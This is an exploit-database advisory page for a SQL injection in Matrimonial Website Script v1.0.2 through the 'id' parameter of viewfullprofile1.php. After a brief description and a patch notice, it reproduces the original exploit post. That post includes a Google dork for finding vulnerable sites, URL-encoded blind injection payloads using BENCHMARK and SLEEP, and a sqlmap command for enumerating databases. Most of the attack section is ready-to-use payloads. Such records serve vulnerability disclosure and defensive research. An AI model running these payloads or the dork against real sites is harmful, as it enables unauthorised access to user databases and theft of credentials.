Matrimonial Website Script v1.0.2 SQL Injection Vulnerability

vendor:

Matrimonial Website Script

by:

Cyber Warrior | Bug Researchers Group | N4TuraL

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Matrimonial Website Script

Affected Version From: v1.0.2

Affected Version To: v1.0.2

Patch Exists: YES

Related CWE: N/A

CPE: a:i-netsolution:matrimonial_website_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 10 / Mozilla Firefox, Linux / Mozilla Firefox, Linux / sqlmap 1.0.6.28#dev

2016

Matrimonial Website Script v1.0.2 SQL Injection Vulnerability

A SQL injection vulnerability exists in Matrimonial Website Script v1.0.2, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'viewfullprofile1.php' script. An attacker can leverage this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords. The vulnerability can be exploited by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

######################
# Application Name : Matrimonial Website Script v1.0.2

# Google Dork : inurl:viewfullprofile1.php?id=

# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL

# Author Contact : https://twitter.com/byn4tural

# Vendor Homepage : http://www.i-netsolution.com/

# Vulnerable Type : SQL Injection

# Date : 2016-09-22

# Tested on : Windows 10 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0.6.28#dev

###################### SQL Injection Vulnerability ######################

# Location :
http://localhost/[path]/viewfullprofile1.php

######################

# PoC Exploit:

http://localhost/[path]/viewfullprofile1.php?id=MM57711%20and%20%2F*%2130000if%28exists%28select%20concat%280x7233646D3076335F73716C5F696E6A656374696F6E%2Ccount%28*%29%29%20from%20%3F%3F%3F.%E7%AE%A1%E7%90%86%E5%91%98%29%2CBENCHMARK%281161102%2C8%2CMD5%280x41%29%29%2C0%29*%2F

http://localhost/[path]/viewfullprofile1.php?id=MM57711%27%20AND%205860%3DIF%28%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29%3E1%29%2CSLEEP%285%29%2C5860%29%20AND%20%27wvYf%27%3D%27wvYf

# Exploit Code via sqlmap:

sqlmap -u http://localhost/[path]/viewfullprofile1.php?id=MM57711 --dbs

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=MM57711' AND 2424=2424 AND 'PgBT'='PgBT

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=MM57711' AND SLEEP(5) AND 'AgXd'='AgXd
---

######################